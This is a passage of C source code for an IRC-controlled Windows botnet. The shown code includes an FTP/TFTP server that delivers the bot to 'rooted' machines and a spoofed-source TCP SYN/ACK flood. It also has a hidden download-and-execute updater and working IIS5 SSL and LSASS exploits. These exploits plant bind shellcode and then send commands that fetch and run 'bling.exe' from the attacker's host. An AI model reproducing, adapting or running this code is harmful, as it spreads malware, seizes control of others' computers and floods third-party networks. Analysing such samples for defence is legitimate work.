send(i,"150 Opening BINARY mode data connection\n",40 , 0);
if(ftp_Data_connect(tmpip,(int)h) == 1) {
if (Ftp_data_transfer() == 1) {
send(i,"226 Transfer complete.\n",23 , 0);
sprintf(sendbuf,"4<<12[ROOTED]: %s, port:%d now executing %s on remote machine.4>>",tmpip,FTP_PORT,ftp.filename);
if (!ftp.silent) irc_privmsg(ftp.sock,ftp.chan,sendbuf,ftp.notice);
addlog(sendbuf);
}
} else {
send(i,"425 Can't open data connection.\n",32,0);
}
}
else if (strcmp(tmpbuf,"QUIT") == 0) {
send(i,"221 Goodbye happy r00ting.\n",27 , 0);
}
memset(buf,0,sizeof(buf));
}
}
}
}
}
return 1;
}
DWORD WINAPI tftpserver(LPVOID param)
{
FILE *fp;
char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
int err=1;
TFTP tftp = *((TFTP *)param);
TFTP *tftps = (TFTP *)param;
tftps->gotinfo = TRUE;
tftp.threads++;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
threads[tftp.threadnum].sock=ssock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)tftp.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
Sleep(5000);
tftp.threads--;
return tftpserver(param);
}
if ((fp=fopen(tftp.filename, "rb")) == NULL) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
while(err>0 && tftps->gotinfo && fp) {
TIMEVAL timeout;
timeout.tv_sec=5;
timeout.tv_usec=5000;
fd_set fd;
FD_ZERO(&fd);
FD_SET(ssock,&fd);
memset(buffer,0,sizeof(buffer));
if(fselect(0,&fd,NULL,NULL,&timeout) > 0) {
SOCKADDR_IN csin;
int csin_len=sizeof(csin);
char f_buffer[BLOCKSIZE+4]="";
err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len);
sprintf(IP,finet_ntoa(csin.sin_addr));
// parse buffer
if(buffer[0]==0 && buffer[1]==1) { //RRQ
char *tmprequest=buffer,*tmptype=buffer;
tmprequest+=2; //skip the opcode
tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) {
fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
// for loop to add a \0 to the end of the requestname
sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
addlog(buffer);
} else { // good rrq packet send first data packet
fseek(fp, 0, SEEK_SET);
f_buffer[0]=0; f_buffer[1]=3; // DATA
f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else if(buffer[0]==0 && buffer[1]==4) { // ACK
// send next packet
unsigned int blocks;
BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #
f_buffer[0]=0; f_buffer[1]=3; // DATA
if (b2==255) { // DATA BLOCK #
f_buffer[2]=++b1;
f_buffer[3]=b2=0;
} else {
f_buffer[2]=b1;
f_buffer[3]=++b2;
}
blocks=(b1 * 256) + b2 - 1;
// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
fseek(fp, blocks * BLOCKSIZE, SEEK_SET);
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
if (err==0) {
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else { // we dont support any other commands
fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len);
}
} else
continue;
}
// check for ack, then msg irc on transfer complete
fclosesocket(ssock);
fclose(fp);
tftp.threads--;
if(tftps->gotinfo == FALSE) {
clearthread(tftp.threadnum);
ExitThread(0);
}
Sleep(1000);
return tftpserver(param);
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
NET_API_STATUS UserInfo(char *ServerName, char *Username, SOCKET sock, char *chan, BOOL notice)
{
char buffer[IRCLINE], *user_priv;
LPUSER_INFO_11 pBuf = NULL;
DWORD dwLevel = 11;
LPWSTR wServerName = (LPWSTR)AsWideString(ServerName);
LPWSTR wUsername = (LPWSTR)AsWideString(Username);
NET_API_STATUS nStatus = fNetUserGetInfo(wServerName,wUsername,dwLevel,(LPBYTE *)&pBuf);
if (nStatus == NERR_Success) {
if (pBuf != NULL) {
sprintf(buffer,"Account: %S",pBuf->usri11_name);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Full Name: %S",pBuf->usri11_full_name);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"User Comment: %S",pBuf->usri11_usr_comment);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Comment: %S",pBuf->usri11_comment);
irc_privmsg(sock,chan,buffer,notice,TRUE);
switch(pBuf->usri11_priv) {
case USER_PRIV_GUEST:
user_priv = TEXT("Guest");
break;
case USER_PRIV_USER:
user_priv = TEXT("User");
break;
case USER_PRIV_ADMIN:
user_priv = TEXT("Administrator");
break;
default:
user_priv = TEXT("Unknown");
break;
}
sprintf(buffer,"Privilege Level: %s",user_priv);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Auth Flags: %d",pBuf->usri11_auth_flags);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Home Directory: %S",pBuf->usri11_home_dir);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Parameters: %S",pBuf->usri11_parms);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Password Age: %d",pBuf->usri11_password_age);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Bad Password Count: %d",pBuf->usri11_bad_pw_count);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Number of Logins: %d",pBuf->usri11_num_logons);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Last Logon: %d",pBuf->usri11_last_logon);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Last Logoff: %d",pBuf->usri11_last_logoff);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Logon Server: %S",pBuf->usri11_logon_server);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Workstations: %S",pBuf->usri11_workstations);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Country Code: %d",pBuf->usri11_country_code);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"User's Language: %d",pBuf->usri11_code_page);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Max. Storage: %d",pBuf->usri11_max_storage);
irc_privmsg(sock,chan,buffer,notice,TRUE);
sprintf(buffer,"Units Per Week: %d",pBuf->usri11_units_per_week);
irc_privmsg(sock,chan,buffer,notice,TRUE);
}
}
else {
sprintf(buffer,"-\x03\x34\2net\2\x03- user info error <%ld>",nStatus);
irc_privmsg(sock,chan,buffer,notice);
}
if (pBuf != NULL)
fNetApiBufferFree(pBuf);
return (nStatus);
}
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
char buffer[IRCLINE];
DWORD r, d, start, total, speed;
DOWNLOAD dl = *((DOWNLOAD *)param);
DOWNLOAD *dls = (DOWNLOAD *)param;
dls->gotinfo = TRUE;
HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
if (fh != NULL) {
// open the file
HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
// make sure that our file handle is valid
if (f < (HANDLE)1) {
sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
clearthread(dl.threadnum);
ExitThread(0);;
}
total = 0;
start = GetTickCount();
char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb
do {
memset(buffer, 0, sizeof(buffer));
fInternetReadFile(fh, buffer, sizeof(buffer), &r);
if (dl.encrypted)
Xorbuff(buffer,r);
WriteFile(f, buffer, r, &d, NULL);
if ((total) < 512000) {
//We have free bytes...
//512000-total
unsigned int bytestocopy;
bytestocopy=512000-total;
if (bytestocopy>r)
bytestocopy=r;
memcpy(&fileTotBuff[total],buffer,bytestocopy);
}
total+=r;
if (dl.filelen)
if (total>dl.filelen)
break; //er, we have a problem... filesize is too big.
if (dl.update != 1)
sprintf(threads[dl.threadnum].name, "[Download]: Download: %s (%dKB transferred).", dl.url, total / 1024);
else
sprintf(threads[dl.threadnum].name, "[Download]: Update: %s (%dKB transferred).", dl.url, total / 1024);
} while (r > 0);
BOOL goodfile=TRUE;
if (dl.filelen) {
if (total!=dl.filelen) {
goodfile=FALSE;
sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
speed = total / (((GetTickCount() - start) / 1000) + 1);
CloseHandle(f);
/* if (dl.expectedcrc) {
unsigned long crc,crclength;
sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
crclength=total;
if (crclength>512000) crclength=512000;
crc=crc32(fileTotBuff,crclength);
if (crc!=dl.expectedcrc) {
goodfile=FALSE;
irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
}
} */
free(fileTotBuff);
if (dl.expectedcrc) {
unsigned long crc=crc32f(dl.dest);
if (crc!=dl.expectedcrc) {
goodfile=FALSE;
sprintf(buffer,"[DOWNLOAD]: CRC Fallito (%d != %d).", crc, dl.expectedcrc);
irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
if (goodfile==FALSE)
goto badfile;
//download isn't an update
if (dl.update != 1) {
sprintf(buffer, "[DOWNLOAD]: D0S Downloaded %.1f KB in %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
if (dl.run == 1) {
fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
if (!dl.silent) {
sprintf(buffer,"[DOWNLOAD]: Apro Il File : %s.",dl.dest);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
// download is an update
} else {
sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB in %s @ %.1fKB/sec. Updato.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo, 0, sizeof(pinfo));
memset(&sinfo, 0, sizeof(sinfo));
sinfo.lpTitle = "";
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESHOWWINDOW;
sinfo.wShowWindow = SW_HIDE;
if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
fWSACleanup();
uninstall();
ExitProcess(EXIT_SUCCESS);
} else {
sprintf(buffer,"[DOWNLOAD]: Update Fallito: Errore Nell'Apertura Del File: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
} else {
sprintf(buffer,"[DOWNLOAD]: Link o DnS Non Trovato SUKKIAMELO!: %s.",dl.url);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
badfile:
fInternetCloseHandle(fh);
clearthread(dl.threadnum);
ExitThread(0);
}
DWORD WINAPI visit(LPVOID param)
{
HINTERNET ch = 0, req = 0;
const char *accept = "*/*";
char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];
vs visit = *((vs *)param);
vs *vsp = (vs *)param;
vsp->gotinfo = TRUE;
// zero out string varaiables
memset(vhost, 0, sizeof(vhost));
memset(vuser, 0, sizeof(vuser));
memset(vpass, 0, sizeof(vpass));
memset(vpath, 0, sizeof(vpath));
// zero out url structure and set options
URL_COMPONENTS url;
memset(&url, 0, sizeof(url));
url.dwStructSize = sizeof(url);
url.dwHostNameLength = 1;
url.dwUserNameLength = 1;
url.dwPasswordLength = 1;
url.dwUrlPathLength = 1;
do {
// crack the url (break it into its main parts)
if (!fInternetCrackUrl(visit.host, strlen(visit.host), 0, &url)) {
sprintf(sendbuf,"[VISIT]: Invalid URL.");
break;
}
// copy url parts into variables
if (url.dwHostNameLength > 0)
strncpy(vhost, url.lpszHostName, url.dwHostNameLength);
int vport = url.nPort;
if (url.dwUserNameLength > 0)
strncpy(vuser, url.lpszUserName, url.dwUserNameLength);
if (url.dwPasswordLength > 0)
strncpy(vpass, url.lpszPassword, url.dwPasswordLength);
if (url.dwUrlPathLength > 0)
strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);
ch = fInternetConnect(ih, vhost,(unsigned short)vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
if (ch == NULL) {
sprintf(sendbuf,"[VISIT]: Could not open a connection.");
break;
}
req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.referer, &accept, INTERNET_FLAG_NO_UI, 0);
if (req == NULL) {
sprintf(sendbuf,"[VISIT]: Failed to connect to HTTP server.");
break;
}
if (fHttpSendRequest(req, NULL, 0, NULL, 0))
sprintf(sendbuf,"[VISIT]: URL visited.");
else
sprintf(sendbuf,"[VISIT]: Failed to get requested URL from HTTP server.");
} while(0); // always false, so this never loops, only helps make error handling easier
if (!visit.silent) irc_privmsg(visit.sock, visit.chan, sendbuf, visit.notice);
addlog(sendbuf);
fInternetCloseHandle(ch);
fInternetCloseHandle(req);
clearthread(visit.threadnum);
ExitThread(0);
}
BOOL IIS5SSL(EXINFO exinfo)
{
char buffer[IRCLINE];
char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
unsigned long XOR=0xffffffff;
unsigned long offsets[] = {
0x6741a1cd, // Win2K SP0
0x6741a199, // Win2K SP1
0x6741a426, // Win2K SP2
0x67419e1d, // Win2K SP3
0x67419ce8, // Win2K SP4
0x0ffb7de9, // WinXP SP0
0x0ffb832f // WinXP SP1
};
BOOL bRet = FALSE;
unsigned char *badbuffer=(unsigned char*)malloc(347);
memset(badbuffer, 0, 347);
unsigned char *p=badbuffer;
memcpy(p, request, sizeof(request));
p+=sizeof(request)-1;
strcat((char*)p, jumper);
strcat((char*)p, bind_shell_code);
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
// FIX ME: since i didnt found a way to determine the remote OS, i
// placed this all together in a loop. this aint the best way
// i'm sure about that
for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) {
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(exinfo.port);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
offsets[i]^=XOR;
strncat((char*)p, (char*)&offsets[i], 4);
strcat((char*)p, shellcode);
if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) {
Sleep(1000);
fclosesocket(sSock);
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons(1981);
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
char cmd_buff[400];
#ifndef NO_TFTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"tftp -i %s get %s\r\n",
GetIP(exinfo.sock),filename, filename);
#endif
#ifndef NO_FTPD
_snprintf(cmd_buff, sizeof (cmd_buff),
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
#endif
if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) {
Sleep(500);
if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) {
fclosesocket(sSock);
bRet = TRUE;
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
break;
}
}
}
}
}
fclosesocket(sSock);
}
}
return (bRet);
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
